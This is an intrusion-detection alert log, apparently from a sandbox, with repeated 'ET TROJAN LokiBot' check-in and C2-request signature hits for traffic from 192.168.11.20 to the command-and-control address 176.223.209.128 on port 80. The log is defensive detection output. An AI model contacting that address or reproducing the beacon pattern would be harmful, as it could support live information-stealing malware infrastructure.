                                              11/25/21-10:48:50.496916TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2025381ET TROJAN LokiBot Checkin4991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2025381ET TROJAN LokiBot Checkin4991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2025381ET TROJAN LokiBot Checkin4991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2025381ET TROJAN LokiBot Checkin4991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2025381ET TROJAN LokiBot Checkin4992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2025381ET TROJAN LokiBot Checkin4992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2025381ET TROJAN LokiBot Checkin4992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2025381ET TROJAN LokiBot Checkin4992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2025381ET TROJAN LokiBot Checkin4992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2025381ET TROJAN LokiBot Checkin4992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2025381ET TROJAN LokiBot Checkin4992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2025381ET TROJAN LokiBot Checkin4992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2025381ET TROJAN LokiBot Checkin4992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2025381ET TROJAN LokiBot Checkin4992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2025381ET TROJAN LokiBot Checkin4993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2025381ET TROJAN LokiBot Checkin4993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2025381ET TROJAN LokiBot Checkin4993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2025381ET TROJAN LokiBot Checkin4993380192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2025381ET TROJAN LokiBot Checkin4993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2025381ET TROJAN LokiBot Checkin4993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2025381ET TROJAN LokiBot Checkin4993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2025381ET TROJAN LokiBot Checkin4993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2025381ET TROJAN LokiBot Checkin4993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2025381ET TROJAN LokiBot Checkin4993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2025381ET TROJAN LokiBot Checkin4994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2025381ET TROJAN LokiBot Checkin4994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2025381ET TROJAN LokiBot Checkin4994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2025381ET TROJAN LokiBot Checkin4994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2025381ET TROJAN LokiBot Checkin4994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2025381ET TROJAN LokiBot Checkin4994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2025381ET TROJAN LokiBot Checkin4994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2025381ET TROJAN LokiBot Checkin4995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2025381ET TROJAN LokiBot Checkin4995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2025381ET TROJAN LokiBot Checkin4995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2025381ET TROJAN LokiBot Checkin4995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2025381ET TROJAN LokiBot Checkin4995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2025381ET TROJAN LokiBot Checkin4995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2025381ET TROJAN LokiBot Checkin4995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2025381ET TROJAN LokiBot Checkin4995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2025381ET TROJAN LokiBot Checkin4995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2025381ET TROJAN LokiBot Checkin4995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2025381ET TROJAN LokiBot Checkin4996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2025381ET TROJAN LokiBot Checkin4996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2025381ET TROJAN LokiBot Checkin4996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2025381ET TROJAN LokiBot Checkin4996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2025381ET TROJAN LokiBot Checkin4996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2025381ET TROJAN LokiBot Checkin4996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2025381ET TROJAN LokiBot Checkin4996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2025381ET TROJAN LokiBot Checkin4996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2025381ET TROJAN LokiBot Checkin4996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2025381ET TROJAN LokiBot Checkin4997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2025381ET TROJAN LokiBot Checkin4997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2025381ET TROJAN LokiBot Checkin4997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2025381ET TROJAN LokiBot Checkin4997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2025381ET TROJAN LokiBot Checkin4997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2025381ET TROJAN LokiBot Checkin4997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2025381ET TROJAN LokiBot Checkin4997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2025381ET TROJAN LokiBot Checkin4997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.11.20176.223.209.128
